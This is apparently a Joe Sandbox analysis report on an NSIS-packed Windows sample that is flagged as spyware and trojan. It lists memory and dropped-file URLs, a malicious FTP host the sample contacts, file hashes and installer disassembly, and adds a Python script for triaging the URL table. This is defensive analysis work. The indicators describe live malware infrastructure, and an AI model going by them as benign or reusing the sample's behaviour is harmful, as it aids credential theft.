                                                                      unknown
                                                                      https://www.google.com/images/nav_logo299.pngbhv8D09.tmp.13.drfalse
                                                                        high
                                                                        https://www.google.com/chrome/static/images/fallback/icon-help.jpgbhv8D09.tmp.13.drfalse
                                                                          high
                                                                          https://www.google.com/complete/search?q=c&cp=1&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authuser=0&bhv8D09.tmp.13.drfalse
                                                                            high
https://www.google.com/accounts/servicelogin | pjavpo.exe, vbc.exe | false | | high
https://consent.google.com/set?pc=s&uxe=4421591 | bhv8D09.tmp.13.dr | false | | high
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImYxODk5OTBhOWZjYjFmZjNjNmMxNDhmYjkzM2M3NzY1Mzk3Z | bhv8D09.tmp.13.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/hpp/Chrome_Owned_96x96.png | bhv8D09.tmp.13.dr | false | | high
http://crl.pki.goog/gsr2/gsr2.crl0? | bhv8D09.tmp.13.dr | false | URL Reputation: safe | unknown
http://pki.goog/gsr2/GTSGIAG3.crt0) | bhv8D09.tmp.13.dr | false | URL Reputation: safe | unknown
https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNQP1yCl9r5iywZTFTjpazv-DURVxDidzMfrF | bhv8D09.tmp.13.dr | false | | high
https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNSrZsXAj6n_sYvivJecwrpYgMhb9ihVGAlz2 | bhv8D09.tmp.13.dr | false | | high
https://www.google.com/chrome/static/images/fallback/icon-fb.jpg | bhv8D09.tmp.13.dr | false | | high
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.9Ky5Gf3gP0o.O/m=gapi_iframes | bhv8D09.tmp.13.dr | false | | high
https://adservice.google.com/adsid/google/si?gadsid=AORoGNSvKHbjRugN8Bruw1IrFif72u8bwsJvZ4BRSrMAhil_ | bhv8D09.tmp.13.dr | false | | high
http://www.founder.com.cn/cn/bThe | pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https | vbc.exe, 0000000D.00000003.325110381.000000000220D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.323407346.000000000222A000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.dr | false | | high
https://www.google.com/complete/search?q=chrome&cp=6&client=psy-ab&xssi=t&gs_ri=gws-wiz&hl=en&authus | bhv8D09.tmp.13.dr | false | | high
https://www.google.com/images/phd/px.gif | bhv8D09.tmp.13.dr | false | | high
https://www.google.com/chrome/static/images/homepage/google-canary.png | bhv8D09.tmp.13.dr | false | | high
https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNQXg7AHkvg6J6S0TqGFa_0HynGV3_XxYfs4fLINJG | bhv8D09.tmp.13.dr | false | URL Reputation: safe | unknown
https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png | bhv8D09.tmp.13.dr | false | | high
https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js | bhv8D09.tmp.13.dr | false | | high
https://www.google.com/chrome/static/js/main.v2.min.js | bhv8D09.tmp.13.dr | false | | high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf | bhv8D09.tmp.13.dr | false | | high
https://cvision.media.net/new/100x75/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9 | bhv8D09.tmp.13.dr | false | | high
http://www.typography.netD | pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://whatismyipaddress.comx&Qqt | pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://fontfabrik.com | pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNTXuGHPo1zFjYPXt7mTG-4GALGGk8bjqjvBm | bhv8D09.tmp.13.dr | false | | high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2 | bhv8D09.tmp.13.dr | false | | high
https://www.google.com/intl/en_uk/chrome/ | bhv8D09.tmp.13.dr | false | | high
https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg | bhv8D09.tmp.13.dr | false | | high
https://googleads.g.doubleclick.net/adsid/google/si?gadsid=AORoGNQXwBwQrE_SUsnWzwpadcOOdc8yOg6JxthQN | bhv8D09.tmp.13.dr | false | | high
https://www.google.com/intl/en_uk/chrome/application/x-msdownloadC: | bhv8D09.tmp.13.dr | false | | high
http://www.sakkal.comuv | pjavpo.exe, 00000005.00000003.266505711.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://images.outbrainimg.com/transform/v3/eyJpdSI6IjJkYTFhZDAwNDEyNzQ2M2E3MGUyMWVkZmIxNmUyZjQ2MjBkM | bhv8D09.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.de | pjavpo.exe, 00000005.00000003.274619011.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.270053098.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.274342061.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.274465406.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.269915108.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.274755127.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094 | bhv8D09.tmp.13.dr | false | | high
https://www.google.com/chrome/static/js/installer.min.js | bhv8D09.tmp.13.dr | false | | high
https://www.google.com/search | bhv8D09.tmp.13.dr | false | | high
https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png | bhv8D09.tmp.13.dr | false | | high
http://whatismyipaddress.com | pjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ | bhv8D09.tmp.13.dr | false | URL Reputation: safe | unknown
https://www.google.com/images/icons/material/system/1x/email_grey600_24dp.png | bhv8D09.tmp.13.dr | false | | high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | bhv8D09.tmp.13.dr | false | URL Reputation: safe | unknown
https://www.google.com/chrome/static/images/homepage/google-beta.png | bhv8D09.tmp.13.dr | false | | high
http://www.msn.com/de-ch/?ocid=iehp | bhv8D09.tmp.13.dr | false | | high
http://www.fontbureau.com/designers/cabarga.htmlN | pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com91S | pjavpo.exe, 00000005.00000002.493470447.0000000000B37000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn | pjavpo.exe, 00000005.00000003.255679895.0000000004F7C000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.254164186.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000003.254335364.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, pjavpo.exe, 00000005.00000002.499537073.0000000006202000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1 | bhv8D09.tmp.13.dr | false | | high
https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js | bhv8D09.tmp.13.dr | false | URL Reputation: safe | unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47 | bhv8D09.tmp.13.dr | false | | high
http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg | bhv8D09.tmp.13.dr | false | URL Reputation: safe | unknown
https://www.msn.com/http://www.google.com/ms-appx-web://microsoft.microsoftedge/ms-appx-web://micros | vbc.exe, 0000000D.00000003.328802653.00000000027E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.327613810.00000000027E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000D.00000002.332890748.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332406171.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000D.00000003.332307194.00000000009EE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://support.google.com/accounts/answer/151657 | bhv8D09.tmp.13.dr | false | | high
https://logincdn.msauth.net/16.000.28230.00/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e | bhv8D09.tmp.13.dr | false | URL Reputation: safe | unknown
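Triage note on the URL table: the Source column tells you far more than the reputation column. Rows sourced only from bhv8D09.tmp.13.dr (a file dropped by process 13, vbc.exe) are Google, MSN, Microsoft login and ad-network links; rows sourced from pjavpo.exe memory dumps include the two whatismyipaddress.com entries (the one with a trailing "x&Qqt" is a memory-string overrun, which is why it scores "low" while the clean one scores "high"). The following Python is an added example, not part of the Joe Sandbox report: it parses rows in the form a plain-text export of this table renders them (URL, source list and Malicious flag run together, an optional "• engine: result" line, then the reputation verdict), attributes each URL to the process image, memory dump or dropped file it was found in, and separates hosts the sample's own processes referenced from hosts that only occur in the dropped file. The sample rows are constructed by copying five rows from this section; the source-token patterns and the process names pjavpo.exe and vbc.exe are taken from this report and are assumptions for any other report.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: five rows copied from this report section, in the
# form a plain-text export renders them.
SAMPLE_ROWS = """\
https://www.google.com/accounts/serviceloginpjavpo.exe, vbc.exefalse
high
http://crl.pki.goog/gsr2/gsr2.crl0?bhv8D09.tmp.13.drfalse
• URL Reputation: safe
unknown
https://whatismyipaddress.comx&Qqtpjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
low
http://whatismyipaddress.compjavpo.exe, 00000005.00000002.493747770.0000000002801000.00000004.00000800.00020000.00000000.sdmpfalse
high
https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=httpsvbc.exe, 0000000D.00000003.325110381.000000000220D000.00000004.00000800.00020000.00000000.sdmp, bhv8D09.tmp.13.drfalse
high
"""

# Tokens that can start the Source column in this report (assumption: other
# reports use other process and dropped-file names; extend the alternation).
SOURCE_START = r"bhv[0-9A-Fa-f]+\.tmp\.\d+\.dr|pjavpo\.exe|vbc\.exe"
# Lazy URL group stops at the first source token; the greedy source group
# backtracks just far enough to leave the trailing Malicious flag.
ROW_RE = re.compile(
    rf"^(?P<url>.*?)(?P<sources>(?:{SOURCE_START}).*)(?P<malicious>true|false)$"
)


def explain_sources(field):
    """Turn 'vbc.exe, <dump>.sdmp, bhv8D09.tmp.13.dr' into origin tuples.
    A process name followed by an .sdmp token is a memory dump of that
    process; a process name on its own is the process image; a .dr token is
    a file dropped during the run (the number before .dr is the dropping
    process id)."""
    origins, pending = [], None
    for tok in (t.strip() for t in field.split(",")):
        if tok.endswith(".sdmp"):
            origins.append(("memory", pending))
            pending = None
        elif tok.endswith(".dr"):
            if pending:
                origins.append(("image", pending))
                pending = None
            origins.append(("dropped-file", tok))
        else:
            if pending:
                origins.append(("image", pending))
            pending = tok
    if pending:
        origins.append(("image", pending))
    return origins


def parse_rows(text):
    """Parse exported URL-table rows into records."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m:
            current = {"url": m["url"], "sources": explain_sources(m["sources"]),
                       "malicious": m["malicious"] == "true",
                       "detections": [], "reputation": None}
            records.append(current)
        elif current is None:
            continue
        elif line.startswith("•"):
            current["detections"].append(line.lstrip("• ").strip())
        else:
            current["reputation"] = line
    return records


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def sample_hosts(records, sample_processes=("pjavpo.exe", "vbc.exe")):
    """Hosts found in the sample's own process image or memory, mapped to
    their (kind, process) origins. Hosts that only occur in a dropped file
    are left out; in this report that file holds browser-history style URLs
    that say nothing about the sample's own traffic."""
    out = {}
    for rec in records:
        own = {(k, p) for k, p in rec["sources"] if p in sample_processes}
        if own:
            out.setdefault(host_of(rec["url"]), set()).update(own)
    return out


def needs_review(records):
    """Rows the engines did not clear: flagged malicious or rated below 'high'."""
    return [(r["url"], r["reputation"], r["detections"]) for r in records
            if r["malicious"] or r["reputation"] != "high"]


if __name__ == "__main__":
    recs = parse_rows(SAMPLE_ROWS)
    for host, origins in sorted(sample_hosts(recs).items()):
        print(host, sorted(origins))
    for url, rep, det in needs_review(recs):
        print("review:", url, rep, det)
```

Run against the full table, the memory-dump rows collapse to a handful of hosts (the font vendors embedded in the .NET binary's resources, whatismyipaddress.com, and the Google and MSN strings in vbc.exe), which is the list worth comparing with the contacted-IP table below rather than the 50-odd browser-history entries.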
IP | Domain | Country | ASN | ASN Name | Malicious
104.16.154.36 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.16.155.36 | whatismyipaddress.com | United States | 13335 | CLOUDFLARENETUS | false
66.70.204.222 | ftp.manchutimefashion.com | Canada | 16276 | OVHFR | true
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 587288
Start date: 11.03.2022
Start time: 11:55:11
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 6s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: TGQfHfehsY (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@9/7@4/3
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 57.7% (good quality ratio 54%)
• Quality average: 79.4%
• Quality standard deviation: 29.3%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtAllocateVirtualMemory calls found
• Report size getting too big, too many NtDeviceIoControlFile calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
                                                                                                                                                       Time        Type               Description
                                                                                                                                                       11:56:41    API Interceptor    5x Sleep call for process: pjavpo.exe modified
                                                                                                                                                      No context
                                                                                                                                                      Process:C:\Users\user\Desktop\TGQfHfehsY.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):604671
                                                                                                                                                      Entropy (8bit):7.973798757569864
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:T4lEobWACXsG1DDymxzOy/8zCgkBzQq+CpcB2rvfDpcWkzU:TqqsCzpUzeRDrg2Lbpn
                                                                                                                                                      MD5:2573C20C1EE479A24A987AF35F211BB2
                                                                                                                                                      SHA1:393BD88475B88060D847ABEFAEBFCCEA79065F09
                                                                                                                                                      SHA-256:48BA86A86EC2091F3642FFD0B85850948E9FD9E010F655DB316D910958FA6C10
                                                                                                                                                      SHA-512:9FA143233525497A44C793AF24ECFE130FF52D87207D0162128BDFE066C915DDD50012CA8C7FCF3A65B2A4397FE6C331FACED703DE2BBE3BF2A587EBCB9F2B81
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x08024e91, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):29884416
                                                                                                                                                      Entropy (8bit):1.0184073286529858
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:o717t8HVmySw781FfXy7R4aUpP9dCr6f63rsLOZ:O5y2ry
                                                                                                                                                      MD5:2E5E8398FB582B15CF9132DD4D6E514C
                                                                                                                                                      SHA1:73A4C046E9F770AA88A9B1E35340A830A49E3372
                                                                                                                                                      SHA-256:8A63D15EC2399D9BBECFF27E85D20504492C35937045F8269E88F96AD510F716
                                                                                                                                                      SHA-512:014A8981081AB8D184A01D91D2BA446541FDA211B6887CCBED32D19908B8767BF67E9A340315D953B4C3780F5FE3A29AB12F418D8ECD1FF837AB09DBB2947EFD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Process:C:\Users\user\Desktop\TGQfHfehsY.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):5087
                                                                                                                                                      Entropy (8bit):6.133390541408052
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:CS6ccaYloOHiRZ+NtVTGumefqv7/IrDDA/qGpFfJ5zOxa+sWfo:Xca+oOCRZ+NtVTZyrI7JMBzOxQWfo
                                                                                                                                                      MD5:0E0E6772DEA62ECCFA391D48D9BF6CD4
                                                                                                                                                      SHA1:FF5EA5E7BFF8A12041D42209021B4AB205A22EF7
                                                                                                                                                      SHA-256:8FE770D252DB864492B6FCE6ADED5AE8D34DB22413FBCA2E221AB84A60C2DE90
                                                                                                                                                      SHA-512:A67E8FDC6CE829AC14B45B33E91A7B1E3CE6A3EAE002D90041C24F73C3374C977E441A309ECB227E1DDE246FA596360FC8CAB3C0AAAC7261B04281AA1C508A1C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Qn:Qn
                                                                                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                      Preview:..
                                                                                                                                                      Process:C:\Users\user\Desktop\TGQfHfehsY.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):120320
                                                                                                                                                      Entropy (8bit):6.316729871952652
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:I5MMCnkgeOdoWzkEXu/1X9fkYL1DMlSgqBDrTrRinUQh1DE4Ph7pcrnB16sWjcdC:IMMuBeMR2/NdRJSoXRih0B1lw/
                                                                                                                                                      MD5:1294A9DDC96CAC3F16FAE32EA9D6670D
                                                                                                                                                      SHA1:CE3E4B59E66E3A4B55BC86D3091BF7DC812FAAFF
                                                                                                                                                      SHA-256:D3FE02905ABE00EBB65EEF308C700B923487EE8805EA529A2A4E65A953955E59
                                                                                                                                                      SHA-512:357312AAB5AF3D6AF26365A523C4E966BA87F071BF997EF6258CD79769F35E0C33F1F1893677883B7B06EC31D76042A4A97134C5857AD1D068A2373BCE53DD09
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................9...........8.........................'..........Rich............................PE..L....*b.................n..........1.............@.....................................................................................................................T..............................@............................................text....l.......n.................. ..`.rdata...O.......P...r..............@..@.data...@/..........................@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\pjavpo.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4
                                                                                                                                                      Entropy (8bit):2.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:IVn:IV
                                                                                                                                                      MD5:41F860E3B7F548ABC1F8B812059137BF
                                                                                                                                                      SHA1:7C7254019CF52A71DF18839B3C433D2DC377F24B
                                                                                                                                                      SHA-256:3E8AB67CE1B66389C3AE94F9C8F8AFDEB70B46A33640554F352868F99D2F5616
                                                                                                                                                      SHA-512:DFF577DDF17B55B4CBAAB526411CFD6AB279ACBEFFA619136DEF4AE7B6013211411C8EBEFF348C74A2250731555DDFB25E9E3A6ADA2361FFB54B7123152A096B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview:6720
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\pjavpo.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):44
                                                                                                                                                      Entropy (8bit):4.135821824148036
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:oNt+kiE2J5xAIMCn:oNwkn23fxn
                                                                                                                                                      MD5:526D4450D1F50E31763D5C10E90212F1
                                                                                                                                                      SHA1:EF6D7779EC7A0A27279D22D59A8D6617C4A76531
                                                                                                                                                      SHA-256:88DBE49BC55658678298111BA729F8EEACD11A5DCA55FBD2D4717FAE1C70F2E9
                                                                                                                                                      SHA-512:8421F429DF8875FA392190FF085E1B9C0CA285E86467AC84A662441A7D393ECFDAB6CE8A9523CD849647EDAF1A424E6C0196F41E95AF75EFF86AB3ACBE8E3FC6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview:C:\Users\user\AppData\Local\Temp\pjavpo.exe
                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                      Entropy (8bit):7.953294197966189
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                      File name:TGQfHfehsY.exe
                                                                                                                                                      File size:663994
                                                                                                                                                      MD5:9b8ec9e094676d88b02f038f318afd86
                                                                                                                                                      SHA1:65f99e529982f1c1a5cf9eb59f60edfeecdf2eec
                                                                                                                                                      SHA256:54fa4651e925e0fd845ca5652d57a010c26e4ab799211b8d3299cbb7dec35ae8
                                                                                                                                                      SHA512:adda29b5ad3a05f9d34ba4a033cc400d9d45cf82887ac292f7174b3853a2d0edddecee939f32ab784e4c2e4cc58631e7bb5137d353546f5024cb7a402e4bd4b8
                                                                                                                                                      SSDEEP:12288:GQJXYVHSW04C0lbXeur5Du1R3biE7h/j5F2Tpt/nGw:sVHVC0lbXUGEBjn27n
                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....
                                                                                                                                                      Icon Hash:b2a88c96b2ca6a72
                                                                                                                                                      Entrypoint:0x4030e3
                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                      Digitally signed:false
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                      DLL Characteristics:
                                                                                                                                                      Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:4
                                                                                                                                                      OS Version Minor:0
                                                                                                                                                      File Version Major:4
                                                                                                                                                      File Version Minor:0
                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                      Import Hash:7fa974366048f9c551ef45714595665e
Instruction
  sub esp, 00000180h
  push ebx
  push ebp
  push esi
  xor ebx, ebx
  push edi
  mov dword ptr [esp+18h], ebx
  mov dword ptr [esp+10h], 00409158h
  xor esi, esi
  mov byte ptr [esp+14h], 00000020h
  call dword ptr [00407030h]
  push 00008001h
  call dword ptr [004070B0h]
  push ebx
  call dword ptr [0040727Ch]
  push 00000008h
  mov dword ptr [0042EC18h], eax
  call 00007F2BEC7525C8h
  mov dword ptr [0042EB64h], eax
  push ebx
  lea eax, dword ptr [esp+34h]
  push 00000160h
  push eax
  push ebx
  push 00428F90h
  call dword ptr [00407158h]
  push 0040914Ch
  push 0042E360h
  call 00007F2BEC75227Fh
  call dword ptr [004070ACh]
  mov edi, 00434000h
  push eax
  push edi
  call 00007F2BEC75226Dh
  push ebx
  call dword ptr [0040710Ch]
  cmp byte ptr [00434000h], 00000022h
  mov dword ptr [0042EB60h], eax
  mov eax, edi
  jne 00007F2BEC74FAACh
  mov byte ptr [esp+14h], 00000022h
  mov eax, 00434001h
  push dword ptr [esp+14h]
  push eax
  call 00007F2BEC751D60h
  push eax
  call dword ptr [0040721Ch]
  mov dword ptr [esp+1Ch], eax
  jmp 00007F2BEC74FB05h
  cmp cl, 00000020h
  jne 00007F2BEC74FAA8h
  inc eax
  cmp byte ptr [eax], 00000020h
  je 00007F2BEC74FA9Ch
  cmp byte ptr [eax], 00000022h
  mov byte ptr [eax+eax+00h], 00000000h
Programming Language:
  • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74b0 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x900 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5b68 | 0x5c00 | False | 0.67722486413 | data | 6.48746502716 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x129c | 0x1400 | False | 0.4337890625 | data | 5.04904254867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
